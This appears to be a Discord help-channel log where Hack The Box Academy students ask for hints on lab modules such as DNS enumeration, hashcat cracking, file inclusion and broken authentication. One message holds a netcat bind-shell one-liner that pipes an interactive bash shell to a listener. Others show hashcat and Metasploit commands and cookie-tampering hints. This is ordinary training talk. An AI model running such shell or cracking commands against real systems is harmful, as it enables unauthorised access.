Does anybody know if I should be updating the subdomains.txt link w real time url?

#

anytime I try to run this it cant find file..

rustic sage
#

@compact compass Go to the directory where "Discovery" is under it.

compact compass
#

It's pointing to GIT

acoustic owl
cinder quarry
#

Hi, i'm on the "Web Enumeration" -> "Gobuster"
i follow the step, but i'm stucked.
it's what i have to do

#

And on my terminal, i've this error :

#

i don't find the problem :/

west canopy
#

@cinder quarry you are missing the port number for the target

cinder quarry
#

with the port number, it works thanks ๐Ÿ˜‰

west canopy
#

np!

compact compass
#

@acoustic owl I've found all the zones...Cant figure out what im doing wrong!

pallid fulcrum
#

Hello, I have a dumb question (searched but did not find anything), how do we get root on the pwnbox web machine? I do not have my user password so i can't do sudo and i do not have machine details like in HTB with my user password.
I need to be root or run sudo to edit my /etc/hosts or to use metasploit.
I use a free account on academy.

compact compass
#

@tough ibex which module?

#

shoot, not there yet.

#

you try Youtube?

late beacon
#

anyone have a hint for the broken authentication skills assessment?

#

||i found the cookie|| and was able to change it to ||support||, but it says that ||it can't have the requested role||

west canopy
#

@pallid fulcrum check the desktop, there should be a my_credentials.txt file

pallid fulcrum
west canopy
#

NP, sorry I didn't see your message sooner

late beacon
compact compass
#

@dense hearth Hey pall, any meaningful hints to solving DNS enum? I've dig'd each address and tried many of the lists...unsure what im doing wrong

jagged zenith
jagged zenith
jagged zenith
late beacon
jagged zenith
#

Look he says , the new insite message function

compact compass
#

@acoustic owl yooo

late beacon
languid ginkgo
#

Hello all,
I'm looking for someone who finished the "Intro to Assembly Language" module.
I'have some questions of this question in the Skills Assessment chapter:
"Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'."

late beacon
#

can someone help me out with the skill assessment for broken authentication?

#

i know you can ||enumerate users via the message panel but i haven't been able to find any valid ones||

kindred prism
#

Found this interesting, not sure why this is happening so I would appreciate if anyone could find the reason for this. I am working on the Introduction to Bash Scripting Module and the first Exercise wants to character count of the 35 generation base64 conversion. Using bash with the following methods; echo -n $var | wc -c OR echo -n $var | awk '{print length}' OR echo ${#var} all produce exactly a count of 1 less than the actual answer. Which I had to tee to a file for python to determine the length to answer the exercise question. ???

urban valley
#

is there a way to copy/paste from kali to pwnbox and vice versa?

west canopy
#

@urban valley I'm not able to copy/paste into pwnbox , it's definitely a pain

unique valve
languid ginkgo
west canopy
#

Ok my mind is blown. Thank you gentlemen ๐Ÿ™‚

rustic sage
acoustic owl
acoustic owl
#

You need to find another username.

jagged zenith
late beacon
muted rampart
#

Hi there, I am stuck in the module SQL Injection Fundamentals page Query results. My problem is that i can't connect to the given target. The Error states:
ERROR 2002 (HY000): Can't connect to MySQL server on '46.101.61.42' (115)

late beacon
#

The message is vague. How do I figure out what departments are available when wordlists aren't working? And when it says "by adding your country code" is it referring to digits or letters? And does it want them prepended or appended? With a dot between the words or not? lol I just need a nudge in the right direction, short on time rn

acoustic owl
late beacon
acoustic owl
late beacon
#

This is the toughest skill assessment I've faced so far

late beacon
# acoustic owl || username.xx ||

If you don't mind, can you give another hint? Once you have the two accounts, what's next? My wordlist that matches the password requirements doesn't work and changing the cookie value gave me an error message

naive aspen
#

Hi,

I've been banging my head on the footprinting DNS question about the FQDN with the last octet of x.x.x.203. I've went through each of the dig commands in the section, I see the sub-domain but I can't find the answer, can someone put me in the right direction as I've spent about 5-6 hours researching but I can't anything. Please help, I'm at the frustrated stage!

acoustic owl
# naive aspen Hi, I've been banging my head on the footprinting DNS question about the FQDN w...

You need to find all the zones.

There are DNS servers that allow zone transfer (dig axfr) from anyone. But you can also configure DNS servers to allow zone transfer only from specific servers.
Then it is necessary to identify such a zone as a zone and then bruteforce it.

You can find a zone if you query a suspected zone with entries that usually occur in zones, such as www, ns, ns1, mail, mail1, etc.

stiff tiger
rustic sage
#

hey anyone ever had their internet drop completely while using burp in a vm? i was in the middle of the web proxies module and my internet completely dropped out. i shut down my laptop and my net came back. anyone else ever experience this?

#

reoccurring issue after opening burp suite in my vm.

rustic sage
#

word. is it something i have to live with or is there a fix?

west canopy
#

That seems unusual but I have heard of stranger things. Does the internet just drop on your VM or for your computer as a whole?

patent blaze
#

Is there anyone that could help me with information gathering module ? This one is kicking my ass ๐Ÿ˜“

patent blaze
acoustic owl
patent blaze
#

I tried everything I could

livid pier
rustic sage
rustic sage
#

it happened around 4 times until i realized it was my vm causing the issue. i always snapshot before i install new tools or update. so i was able to revert back to before it happened. everything seems to be working fine now.

late beacon
#

What's the user for the SSH attack in the Passwords Attack module?

#

I ran net users and used the provided password list against all of them but none of them worked.

acoustic owl
patent blaze
acoustic owl
rustic sage
acoustic owl
low vine
#

I feel like i may be blind or this box is wrong "Enter "THIS COMMAND" to find the version.....version shown = 7.1.3......WRONG"

#

"Shells & Payloads

#

Anatomy of A Shell i'm straight up not understanding how 7.1.3 for the version number is wrong

#

It shows a new release is avialbable, but i'm not the one maintaining these boxes so really having a hrda time understanding why I'm wrong?

#

In Pwnbox issue the $PSversiontable variable using PowerShell. Submit the edition of PowerShell that is running as the answer.

acoustic owl
#

Reload the Academy page and then try again

low vine
#

still doesnt accept

west canopy
#

@low vine Read the question carefully, it is asking for the Edition of powershell being used ๐Ÿ™‚

urban valley
#

Hi, can someone help me with Cracking with Hashcat- Hybrid Mode? I keep getting bypassed. Here's my syntax: hashcat -a 7 -m 100 hash.txt -1=01 '?d?s' rockyou.txt

#

hash.txt = 978078e7845f2fb2e20399d9e80475bc1c275e06

west canopy
#

@urban valley i got you dawg

hazy grotto
#

I know this isn't the right place but im having issues

#

Ive gotten this thing on my computer. I did an update. had a alert about win32/lodi i believed it to be from surfshark. theres been alot of issues. well i continue to scan and find this

hazy grotto
#

ok so. i looked at the file location. It was a .md file that i had created and took notes on for a reverse shell and prolly had some code in it. lol I think im safe?

west canopy
#

I mean... how confident are you that it's a file you put there yourself? lol

runic rampart
low vine
#

It might have been.....but i was giving the version not the "edition"

#

<

#

<

#

<

hazy grotto
raven cairn
#

@hazy grotto Your probably fine but I would still triple check

hazy grotto
#

I'm currently on this problem as well. i feel like im missing something like usual

hazy grotto
hazy grotto
modern osprey
#

Hello everyone, I'm having a problem with the labs

#

can anybody help me?

hazy grotto
#

@acoustic owl
i could use you right now lol. you seem to be an expert on FQDN dns footprinting question

kind turret
acoustic owl
hazy grotto
woeful oxide
#

Hey team

#

any idea of how to fix this?

#

Its supposed to show a full list of hashes

west canopy
#

@woeful oxide which section is that from? I can test it on my end

steady blaze
#

hyy

#

i was cloneing beef

#

its giving eroor

#

@languid fjordhyy sir soory for ping but i am munt in general chat

faint rampart
#

module - Web request -> HTTP Methods ->GET
Could someone help me with below question. In my instance, i coudnt find the search.php?search= parameter in dev tools.

Question :The exercise above seems to be broken, as it returns incorrect results. Use the browser devtools to see what is the request it is sending when we search, and use cURL to search for 'flag' and obtain the flag.

jagged zenith
#

Add in academy exam certificate bug bounty

pine sable
# west canopy <@!920003707209416714> Holy sh*t dawg I solved it!

[Edited]
Nvm. After restarting the target all worked fine and i was able to get both flag ๐Ÿ™‚
//
Hii. Do you have some tips for the first flag ?
Am actually trying to exploit the XSS vuln but i have some trouble with the API. "Something went wrong :(" when i send my vuln URL

jagged zenith
#

@west rampart
Hello l have questions

west rampart
#

ask

woeful oxide
jagged zenith
#

Will my account be debited?

west rampart
#

Please open up a ticket.

jagged zenith
jagged zenith
jagged zenith
rustic sage
rustic sage
rotund mountain
#

Hello! I'm having troubles with the "CRACKING PASSWORDS WITH HASHCAT" module, "WORKING WITH RULES" submodule. I cannot crack the hash even though I feel like I have everything setup fine. the hint states, "Create a custom rule and combine it with the rockyou.txt wordlist. This exercise was created in the year 2020" which is exactly what I'm doing. Screenshot should show my attempt. Would anyone be willing to take a look and point out where I'm going wrong? Thanks!

Here's some of the info for someone to set it up:
Hash: 46244749d1e8fb99c37ad4f14fccb601ed4ae283
My rule: $2 $0 $2 $0

rustic sage
#

Read the question again :)

rotund mountain
#

You're right! I misunderstood! Thank you! I cracked it ๐Ÿ™‚

rustic sage
#

Hello! I'm having troubles with the **SHELLS & PAYLOADS **module, on PHP Web Shells section. I cant connect with the proxy and I don't know what I have to do, if anyone have done this section, pls help me

livid pier
#

Another freshie?

jagged summit
#

Hello everyone, am a beginner in htb-academy. Can anyone guide me how to complete this. Tried whatever i understood from the section. But nothing is working.

#

Module: File Inclusion
Section: Basic Bypasses

feral gyro
#

then start traversing

muted rampart
jagged summit
muted rampart
rustic sage
west canopy
#

@jagged summit feel free to DM me

woeful oxide
#

its supposed to work like this

#

and i got this

west canopy
#

well in the second screenshot , you appear to not actually have a file called hashes.txt

narrow wasp
#

Need some help with command injection skill assessment

grim gust
#

Do we need to create a new account (to login in the HTB Academy) because I cannot login with my HTB account ?

mortal basin
#

Yes academy needs a separate account

broken saffron
#

@rustic sage sure just ping me if you still need help

west canopy
#

@narrow wasp feel free to DM me ๐Ÿ™‚

fast timber
#

hey guys, is there any error on the module File Inclusion, Log Poisoning? I already got the second question, which is the flag.. but the first question just don accept my answer

#

it ask me what's the command "uname -r" output.. i write it, and it tells me its wrong

west canopy
#

@fast timber DM me

stark atlas
#

Is anyone able to help with the last two questions on the SMB module of Footprinting? I can't seem to get pass them

severe birch
#

I am having an issue retrieving flag1 from Linux Local Privilege Escalation - Skills Assessment, I have flags 2 through 5 and am not sure why I cannot get flag 1. Would someone be able to point me in the right direction?

west canopy
#

@severe birch check for hidden files/folders ๐Ÿ™‚

severe birch
#

I'd found information mentioning flag1 in a hidden file, but it was not located where is was referred to in that hidden file.

knotty hemlock
#

Hi all, can I DM anyone regarding the final assessment of file uploads? I found the uploading page, but even for requests which should be valid i always get "Only images are allowed"

west canopy
#

@severe birch trying doing something like ls -laR from inside the htb-student directory

severe birch
west canopy
#

@knotty hemlock DM me brother!

lavish needle
#

Hey everyone, having a little trouble on the XSS module - XSS Discovery section - last question. I've summitted the type of xss injection the server was vulnerable to but somehow not getting the answer correct

west canopy
#

@lavish needle DM me dawg ๐Ÿ™‚

west canopy
#

@runic wave that should be correct

rotund mountain
#

Hey all! I've been stuck on module: CRACKING PASSWORDS WITH HASHCAT, submodule: Cracking Common Hashes. I'm trying to crack the hash 7106812752615cdfe427e01b98cd4083.

I've been poking around google and I found someone saying that I'm not safe to assume this is an md5 hash. This left me confused as how to interpret the output of hashid.
Hashid gives me an output of:
<SNIP>
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
<SNIP>

Since MD2 has no hashcat mode, I went to the next which is MD5. Are all of these types equally likely meaning I should try all of them, or is there another way to look at this output?

Also, when applying built in hashcat rules I am getting some instances of 400 Billion+ combinations that will easily take 6+ hours to run. I feel like there is information that I am failing to imply at this point since going in the direction I am will seemingly take me weeks.

Would someone be willing to point me in the right direction or help talk me through what I should be implying to crack this hash?

Thank you!

west canopy
#

@rotund mountain DM me brother!

raw bay
#

Feel like Iโ€™m missing something here, working on the Linux Fundamentals module. The question is: โ€œUse the systemctl command to list all units of services and submit the unit name with the description Load AppArmor profiles managed internally by snapd.โ€

systemctl list-units โ€”type=service |grep armor yields only one result, apparmor. When submitting apparmor or apparmor.service, both are wrong. Grepping for snapd yields no results, and profiles lists only the same apparmor service which doesnโ€™t appear to be correct. Am I missing something on my web based vm instance, something not installed correctly?

west canopy
#

@raw bay you are super close, feel free to DM me!

raw bay
#

@west canopy If Iโ€™m not missing anything and just need to figure it out, Iโ€™ll do that, but wasnโ€™t sure. Appreciate the response, will dm if the wall starts hurting my head. ๐Ÿ‘

viral yarrow
#

clear

#

pwd

modern epoch
#

Hey guys, any hint to Password Attacks - Mutation? I got 3 valid users and after passing the supplied list of passwords to the specified rule and applying sort and removing the duplicates I got a list with the size of about 92000 entries. But if these lists are used in the hydra, all processing will take about 30h to be completed. My question is, how did the author expect the exercise to be resolved? That password list can be build in a lot of variety of pre-processing or ordering that maybe not match the middle processing time of the used list of the author. (anyway, the exercise dont give any cube. But this is a little frustrating)

west canopy
#

@modern epoch Wish i could help brother , I haven't tried that module yet

#

I know for the Hydra module, typically it would crack the password very quickly . And if it ended up taking longer than a minute or two, it's because you were using the wrong wordlist or command. Not sure if that's the case with this module though.

modern epoch
lost kayak
#

is there anywhere we can get a list of the changes made to updated modules?

west canopy
#

@lost kayak You check the "Change Log" in the module Summary. It does not give specifics however (i.e., it doesn't say which sections were added or changed)

ember crest
#

Hey everyone, I'm working through the Linux Fundamentals module and I'm stuck on the Working with Web services final question. It's asking to "start a simple HTTP server inside Pwnbox or your local VM using "php". Submit the command that starts the web server on the localhost (127.0.0.1) on port 8080." I have submitted the following "php -S 127.0.0.1:8080" "php -S localhoast:8080" "php -S localhost -p 8080" and "php -S 127.0.0.1 -p 8080". I did some googling and everything seems to say that that's the way you do it. But I keep getting a message that it's wrong. (I also tried "-S 127.0.0.1:8080" etc.) Does anyone have any idea what I'm doing wrong. It seems to work on my VM.

paper gust
west canopy
#

@ember crest you are super close. Try: php -S 127.0.0.1:8080

paper gust
#

If i'm not mistaken, the point is to provide an example of why guessing the hash type based off purely how it looks/is formatted isn't reliable

#

Also i know the module is a bit out of date at this point but if you are using recent hashcat, we've added that functionality inline

ember crest
weary sand
#

I have this

#

but when i try to ssh to the target this happen

west canopy
#

@weary sand try doing: ssh user1@159.65.81.40 -p 31185

weary sand
#

thank you :)

livid pier
west canopy
#

Only 31 hours to go!

true owl
#

hello everyone...good morning !!

#

how to share my HTB profile on linkedin

#

??

bold cave
#

@true owl bruh plz tell me is this website teach me from basics

#

@agile spire Hy bro plz guide me from where I can learn basics

novel matrix
#

Well, seems like bot got to it before me

orchid ingot
#

Hi, anyone knows about the business price of hackthebox academy? How it works?

novel matrix
modern epoch
#

Hey guys, in "Password Attacks", section "Password Mutations" what is the format of the found flag must be used? After cracking the file the flag inside is not recognized as a valid answer.

signal topaz
#

probably u checked for spaces,tabs?

#

yo, quick Q: does the HTB CBBH voucher includes additional training/labs?

drifting knoll
signal topaz
#

did anyone finish Web Service & API Attacks - Skills Assessment? I think there is a bug there, but I might be wrong

rustic sage
#

Hi! I have a question about module: 'Using Web Proxies'

There is a task:

Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request?

I cannot use BurpSuite so I m using ZAP, and for some reason after writing in all the correct info in MSF, the req/res isnt captured

signal topaz
#

set PROXIES HTTP:127.0.0.1:8080 should do the trick?

rustic sage
# signal topaz set PROXIES HTTP:127.0.0.1:8080 should do the trick?

thats what I did, I followed the exact manual:

$ msfconsole

msf6 > use auxiliary/scanner/http/robots_txt
msf6 auxiliary(scanner/http/robots_txt) > set PROXIES HTTP:127.0.0.1:8080

PROXIES => HTTP:127.0.0.1:8080


msf6 auxiliary(scanner/http/robots_txt) > set RHOST 142.251.36.142

RHOST => 142.251.36.142


msf6 auxiliary(scanner/http/robots_txt) > set RPORT 80

RPORT => 80


msf6 auxiliary(scanner/http/robots_txt) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
signal topaz
#

hmm I would try also with proxychains

rustic sage
rustic sage
dry pumice
#

hey ! Is anyone as done the ATTACKING WEB APPLICATIONS WITH FFUF module ? I'm stuck at the filtering section and I don't understand why

fleet moth
#

@dry pumice i did it, but it was some time ago

dry pumice
#

I think my problems is with etc/hosts file

#

I add the domain as ask but I don't know, I got nothing when I try to run the given example command

fleet moth
#

how does Your etc/hosts looks like?

#

if i remember correctly, You have to consider the subdomain in the hosts file

dry pumice
#

subdomain ?

#

I just add admin.academy.htb to the file

fleet moth
#

but You are asked to fuzz the subdomains, arent You?

#

it is something like <subdomain>.academy.htb

dry pumice
#

yes, but in admin.academy

#

...

fleet moth
#

what is the question exactly?

dry pumice
#

I read the wrong question ๐Ÿคฆโ€โ™‚๏ธ

lapis falcon
#

Hello, can somebody help me: every time I connect to the ssh server after a few minutes the terminal freezes and I can't do anything.

#

Linux Fundamentals
|----> System Information

signal topaz
#

vpn drops probably

paper crag
frigid summitBOT
#
Roseme#2867 has been warned

Reason: Mass mention

#
Roseme#2867 has been warned

Reason: Mass mention

modern epoch
livid pier
jolly sonnet
#

Should I use parrot for HTB Academy or am I good using Kali?

modern epoch
mortal basin
modest moth
#

i dont need the answer, i just need a nudge on the command injections assesment. i am 100% certain i found the injection point. i have tried many kinds of bypass methods, so i just want to make sure. Am i able to add a method after what is ran by the file manager script?

#

not method, sorry, a command.

#

like i know on the back end it is 100% using the "mv (original file) (new file location)"

west canopy
#

@modest moth DM me dawg ๐Ÿ™‚

livid pier
#

Anyone else having trouble getting targets to spawn?

honest mauve
#

someone speaks Spanish

livid pier
#

@twin raft speaks spanish

twin raft
#

Hola que onda

honest mauve
#

Hola

twin raft
honest mauve
#

Yo quiero aprender

#

Informรกtica

#

@twin raft

twin raft
#

Va y cuรกl es tu duda?

honest mauve
#

Ese es el problema ๐Ÿ˜ž

#

No se nada ๐Ÿ˜ฃ

twin raft
honest mauve
#

Me la paso intentando aprender por mi cuenta pero no encuentro donde aprender

#

Asi es quiero aprender

twin raft
#

Bueno, este es un muy buen lugar pero tal vez te parezca un poco abrumador al principio, si quieres manda dm y te ayudo con eso

twin raft
livid pier
honest mauve
#

Yo no hablo nada de ingles:(

livid pier
#

ingles es stupido

acoustic owl
livid pier
fleet moth
#

is there anyone who could help me with the broken auth module? section Cookie Bruteforcing

honest mauve
acoustic owl
livid pier
keen surge
#

I'm looking for a mentor, I'm a beginner

frigid summitBOT
#
Roseme#2867 has been warned

Reason: Mass mention

#
Roseme#2867 has been warned

Reason: Mass mention

#
Roseme#2867 has been warned

Reason: Mass mention

snow shoal
acoustic owl
# livid pier

yes, but deep translates better, most of the time at least.

livid pier
twin raft
keen surge
#

ok)

twin raft
gleaming lynx
#

no

#

hacking isnt real

#

just do your best

honest mauve
#

termux is of any use?

broken warren
#

Can anyone provide the word list needed for the Using Web Proxies module? For the burp intruder section, the question that asks to find the .html file in the admin directory.. Ive tried the common.txt one used In that section and have had 404 on every request. I can't tell what I'm doing wrong if I don't know the list I should be using.

eager rivet
broken warren
west canopy
#

@broken warren Just tested on my end, was able to get the flag using common.txt

frigid summitBOT
#
Roseme#2867 has been warned

Reason: Mass mention

#
Roseme#2867 has been warned

Reason: Mass mention

#
Roseme#2867 has been warned

Reason: Mass mention

broken warren
west canopy
#

You want the payload position to look like this:

eager rivet
grand locust
#

can someone help with sql essentials flag4. I've got the --data option, but not sure about the file?

broken warren
livid pier
#

Fun mod, big whoopsie tho

west canopy
#

How was it?

livid pier
west canopy
#

@grand locust I think you just copy/paste the full HTTP request into a file

#

@livid pier intentionally or no?

livid pier
#

It was the first super cheese I found

#

Kinda happy about that

west canopy
#

Are the preceding sections yes/no questions or do you have to find flags?

livid pier
#

Even if they arnt, they are super easy tho

broken warren
#

Finally got the flag, much thanks to those who steered me in the right direction

livid pier
#

It shouldnt have been a medium mod

#

But ya the mods with Yes/No questions are disappointing. I question if they cant make a question for us to practice the exploit how will we use that exploit IRL?

acoustic owl
rustic sage
#

an npm -Pn scan shows the port (22) is filtered. I'm kinda stuck and really don't know what to do. Any help?

west canopy
#

@rustic sage DM me brother ๐Ÿ™‚

pastel ginkgo
#

I think this is a very easy question, How do you break a command in a remote connection, without breaking your remote connection as well.

unreal sigil
#

HTB Academy > Path > Breaking Into HTB > Web Requests > HTTP Methods > GET

#

โ”€[us-academy-2]โ”€[10.10.14.118]โ”€[htb-ac454410@pwnbox-base]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$ curl 'http://138.68.180.98:32286/search.php?search=le' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: /' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://138.68.180.98:32286/' -H 'DNT: 1' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'Connection: keep-alive' -H 'Sec-GPC: 1'
Please use cURLโ”€[us-academy-2]โ”€[10.10.14.118]โ”€[htb-ac454410@pwnbox-base]โ”€[~]
โ””โ”€โ”€โ•ผ [โ˜…]$

#

I don't know what I'm doing wrong lol

#

I feel like I'm following the directions but the only response I'm getting is "please use curl" even though I obviously have the curl command in there

pastel ginkgo
#

Try dropping out the unnecessary stuff from the command, your pasting the entire firefox command

#

also make sure you have your own authorization code, you should be able to pull it from your browser

unreal sigil
#

yes, I was able to get the flag now. thanks so much

weary forum
#

Hello, everyone. I am having problems with the Shells and Payload Module. The problem I am having trouble with is binding a Bash shell to the TCP session.

#

So, I got a Netcat connection, but I was unable to create a bind shell. rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f

#

Right now, when I enter in this command, it just get repeated

west canopy
#

@weary forum Once you enter that command , it will more or less "hang" in the terminal. But you should still be able to netcat in from your workstation:

urban valley
#

Hi has anyone been able to do the Hybrid Mode section of Cracking Passwords With Hashcat? I'm not sure if the module is broken or something but my syntax (hashcat -a 6 -m 100 978078e7845f2fb2e20399d9e80475bc1c275e06 rockyou.txt '?d?s' ) isn't working. I've verified it with another person who completed the module but its not working on my end for some reason

near nacelle
#

any free to answer a question about the "HTTP Headers" Module of web requests?

west canopy
#

@near nacelle sure

livid pier
#

Bro a new freshie!?!?!

#

HTB on a roll

blissful verge
#

๐Ÿ˜‰ watch this space during the month of April

livid pier
west canopy
#

mrb3n has eye of the tiger playing on repeat literally nonstop everyday

fast timber
#

Hey guys

west canopy
#

The LFI question?

fast timber
#

yeh

west canopy
#

I have not ๐Ÿ˜ฆ . My buddy is working on the module and he was getting the same answer as you though.

#

cause he also asked me about it

stark atlas
#

Anyone able to help with the last question on the DNS, footprinting module?
What is the FQDN of the host where the last octet ends with "x.x.x.203"?

fast timber
#

it could be an error

#

appreciated

west canopy
#

Yea i basically got lucky because I finished the old module , so the when the new version came out the solution was already there for me

#

ill let you know if i make any progress

fast timber
#

nice, thanks

weary forum
broken saffron
#

Hi everyone! Some one of you already pass or is doing the new web services & api attacks module? I have a some difficulty finding the answer for SQLi injection.

blissful verge
#

Is anyone here interested in Active Directory?

livid pier
#

I am intrigued

dense fulcrum
#

any news about jr. penetration tester path?

stark atlas
#

Anyone able to help with the last question on the DNS, footprinting module?
What is the FQDN of the host where the last octet ends with "x.x.x.203"?

west canopy
#

@stark atlas you will need to run the dnsenum command, along with a wordlist , against one of the subdomains discovered earlier

stark atlas
#

will give it ago

west canopy
#

Right, you don't want to run it against inlanefreight.htb , but one of the subdomains, i.e. xxx.inlanefreight.htb

livid pier
#

Something a little closer to home

stark atlas
#

Found it! Thank you... only almost 2 hours trying to figure it out.

urban valley
paper gust
#

Sure

urban valley
#

Thank you to chick3nman for helping me with Cracking Passwords With Hashcat. I thought you were supposed to press "Bypass" when it showed up because i assumed Hashcat just paused or something but you're jsut supposed to let it run ๐Ÿ˜›

novel matrix
topaz condor
novel matrix
snow shoal
#

Hi, I am having trouble with the last skill assessment on the Windows Fundamentals module

#

Anyone around for a quick screenshare?

west canopy
#

@snow shoal I can try and help , what's up?

snow shoal
snow shoal
west canopy
#

sure

snow shoal
weary forum
livid pier
#

I can taste it. Has anyone finished yet?

west canopy
#

I'm hot on your tail

surreal rain
#

Awesome to see this progress!

velvet sparrow
#

anyone have the same problem with me on module WEB SERVICE & API ATTACKS the machines are so unstable I can't finish the lab

pine sable
signal topaz
low dirge
rotund plover
#

Anyone planning to take cbbh?

jagged zenith
rotund plover
#

Pm me

junior hazel
#

Did someone finished the Session Security module ?

wintry gorge
#

can anyone give some help on the information gathering web edition module? I cant seem to dig out a TXT record

jagged zenith
wintry gorge
#

found it, queried the wrong zone, thanks!

ancient phoenix
#

Ive spent the last 3 hours trying to download metasploit?

#

does anybody have some advice

#

i cant delete files on my ubuntu vm cuz theyre locked i do chmod 755 and they can be deleted

#

i have like 10 metasploit files

#

maybe the multiple locked files are interferring with eachother?

#

i do msfconsole nothing happens

unique valve
slim lagoon
#

Hey guys hows it going ? Got a question why do I get the output sh: 1: /bin/bash/sh: not found. Help would be appreciated ๐Ÿ™‚

velvet sparrow
#

anyone succeed on module: Web Service & API Attacks section: Skills Assessment but with sql inj not with file upload technique?

unreal patio
#

I'm stuck on this module because it wants me to use pipelist.exe but it's not installed on the machine

paper crag
#

Anyone completed this Password Attacks easy lab? It's driving me mental!!!

sharp citrus
#

Hello eneryone

#

any one has done the : Active Subdomain Enumeration

#

how did you do it

#

Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer

maiden slate
#

Can anybody help me in the "Hacking Wordpress" module, I've been stuck for days.

#

I have to find the flag.txt file in the 'directory indexing' section, and for the life of me I can't figure it out. I know I'm doing something wrong, just don't know what.

lethal atlas
maiden slate
#

@slim lagoon@lethal atlasI did re-read the module, and have tried curl, wpscan, and ffuf and can't find the file. Do you have to tree the directories within curl, if so, how do you do that. the curl commands they have in the module are not giving me the directory.

lethal atlas
glacial blaze
#

Hi,
Can someone help me figure what i am missing on a module ? (Network Enumeration with Nmap, NSE section)

lethal atlas
glacial blaze
lethal atlas
#

no, you will not see the flag returned when running nmap.

#

Running the scan should return the information you need to find the flag.

#

keep it simple, do not over think it or over complicate it. The keyword is "find" also known as enumerate, keep that in mind when picking your nmap script.

glacial blaze
#

Thank you ๐Ÿ™‚

sharp citrus
#

and didnt work

sharp citrus
#

alright

glacial blaze
lethal atlas
#

anyone online that can help me with broken authentication?

livid pier
#

@west canopy ๐Ÿ˜‰

lethal atlas
#

I havent had time to work on things lately. Im only 75% done with bug bounty path.

livid pier
lethal atlas
feral gyro
#

yes

west canopy
#

@unreal patio check C:\tools

maiden slate
#

@lethal atlas Would it be alright to DM with a question on my process?

distant stream
distant stream
junior hazel
maiden slate
#

@lethal atlas Thanks bro, couldn't have figured this out without your guidance.

maiden slate
broken warren
#

Using Web Proxies skills assessment, first question. How do I enable the /lucky.php button. I've intercepted in burp and sent to repeater, but Im completely lost. I've tried changing req method as well as inspecting element on Firefox but keep coming up short

west canopy
#

@broken warren you want to right click, inspect element, and set value='true' next to name='get flag'

#

After you do that you can click the button. It typically takes several attempts before it spits out the flag

quaint marsh
#

LFI and File Uploads

#

Use any of the techniques covered in this section to gain RCE and read the flag at /

#

Where is a Flaf?

#

flag?

broken warren
west canopy
#

@quaint marsh it is the very long text file at the top. But remove the "GIF8" because that is just part of the output from your shell

quaint marsh
#

Stx very mach